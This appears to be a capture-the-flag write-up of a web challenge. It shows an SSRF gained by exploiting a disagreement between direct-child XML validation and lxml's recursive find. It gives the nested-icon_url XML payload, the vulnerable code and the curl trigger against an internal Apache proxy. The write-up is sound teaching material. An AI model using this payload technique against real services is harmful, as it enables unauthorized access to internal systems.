pwneglyph logo
web web-server ssrf xml lxml xpath-find-disagreement parser-differential validation-bypass pycurl reverse-proxy apache internal-service

The settings endpoint validates only the direct-child <icon_url> (must start with https://), but fetch_icon resolves it with lxml's recursive .find('.//icon_url'). Nest an http:// icon_url one level deeper to SSRF the internal Apache proxy, whose AliasMatch serves flag.txt for any non-root path.

Bubulle Corp — XML find() disagreement → SSRF to an internal proxy flag alias

CTF: FCSC 2026 · Category: Web (server-side) · Author: Mizu

Challenge overview

Three services: a public Flask frontend, an internal backend (Flask, only reachable through the proxy), and an Apache internal-proxy. The proxy config is the whole point:

HttpProtocolOptions Unsafe
AliasMatch "^/.+" "/flag.txt"          # any non-root path -> serves the flag file
<Location "/">
    ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On
</Location>
<LocationMatch "^/.+"> ProxyPass "!" Require all granted </LocationMatch>

So / proxies to the backend, but any other path (/x, /anything) is served the local flag.txt. We just need to make something issue an HTTP request to http://internal-proxy/<anything> and read the response. The frontend's "profile icon" feature is that something.

The icon SSRF and its validation

Settings are stored as XML: <settings><icon_url>...</icon_url><method>GET</method></settings>. On save, the frontend validates the direct children:

# routes.py /settings
child_tags = [elem.tag for elem in root]
# ... requires icon_url + method present ...
for elem in list(root):                                  # DIRECT children only
    if elem.tag == "icon_url" and (not elem.text or not elem.text.startswith("https://")):
        return ... "Icon URL must start with https://"
    if elem.tag == "method" and elem.text not in ("GET", "POST"): return ...
    if elem.tag not in ("icon_url", "method", "body"): root.remove(elem)   # body is allowed!

But when the icon is actually fetched, the URL is resolved with lxml's recursive descendant search:

# icon.py
icon_url = root.find(".//icon_url").text          # ".//" = first icon_url ANYWHERE in the tree
method   = root.find(".//method").text
c.setopt(pycurl.URL, icon_url.encode("latin1"))
c.perform()

Validation walks direct children; execution does a recursive descendant find. That mismatch is the bug.

Exploit: nest the real URL deeper

body is an allowed child, so put the malicious http:// URL inside <body>, and keep a benign top-level <icon_url>https://example.com</icon_url> to satisfy validation. In document order the nested one comes first, so .find('.//icon_url') returns it:

<settings>
  <method>GET</method>
  <body><icon_url>http://bubulle-corp-internal-proxy/x</icon_url></body>
  <icon_url>https://example.com</icon_url>
</settings>
  • Validation: direct children are method, body, icon_url — the direct icon_url starts with https:// ✓, method is GET ✓, body is allow-listed ✓.
  • Execution: .find('.//icon_url') returns the nested http://bubulle-corp-internal-proxy/x.

Save it, then hit /icon to trigger the fetch; the proxy's AliasMatch serves flag.txt for /x, and the frontend returns the fetched bytes:

curl 'http://bubulle-corp/icon' -H 'Cookie: session=...'   # -> flag

Takeaways (generalized technique)

  • Validate-vs-use parser disagreement in XML: code that validates by iterating direct children (for e in root) but later resolves with a recursive selector (.//tag, XPath descendant::) lets you smuggle a malicious node one level deeper (inside an allow-listed wrapper like <body>).
  • lxml find('.//x') returns the first matching descendant in document order — control ordering to pick which node "wins".
  • SSRF value is whatever the internal topology gives you: here an Apache AliasMatch "^/.+" serves the flag for any non-root path, so a single GET to the internal proxy is enough.
  • The sequel Bubulle Corp 2 keeps this SSRF+CRLF primitive but moves the real flag behind the backend, forcing HTTP request smuggling.

Sources & references